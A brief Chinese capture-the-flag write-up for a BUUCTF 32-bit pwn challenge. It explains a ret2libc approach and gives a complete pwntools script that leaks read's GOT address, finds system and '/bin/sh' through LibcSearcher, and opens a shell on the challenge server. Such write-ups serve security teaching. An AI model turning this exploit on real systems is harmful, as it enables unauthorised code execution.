[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop
- 题目地址: https://buuoj.cn/challenges#铁人三项(第五赛区)_2018_rop
- 思路:
没有sytem函数,所以应该需要自己去找. 从旁边的函数列表发现了write函数,可以利用将 read 函数的 got所储存的内容泄露出来,泄露出read函数的实际地址 。利用循环调用,再次调用read函数, 然后利用偏移找到system函数和 '/bin/sh'字符串的位置。最后组成payload
exploit
from pwn import *
from LibcSearcher import *
elf = ELF("./2018_rop")
p = remote("node3.buuoj.cn",28628)
read_plt = elf.plt['read']
read_got = elf.got['read']
write_plt = elf.plt['write']
main_addr = 0x080484C6
payload = 'a' * (0x88 + 0x4)
payload += p32(write_plt) + p32(main_addr)
payload += p32(1) + p32(read_got) + p32(8)
p.sendline(payload)
read_addr = u32(p.recv(4))
print hex(read_addr)
libc = LibcSearcher("read", read_addr)
libc_base = read_addr - libc.dump("read")
sys_addr = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")
payload = 'a' * (0x88 + 0x4)
payload += p32(sys_addr) + p32(0) + p32(binsh)
p.sendline(payload)
p.interactive()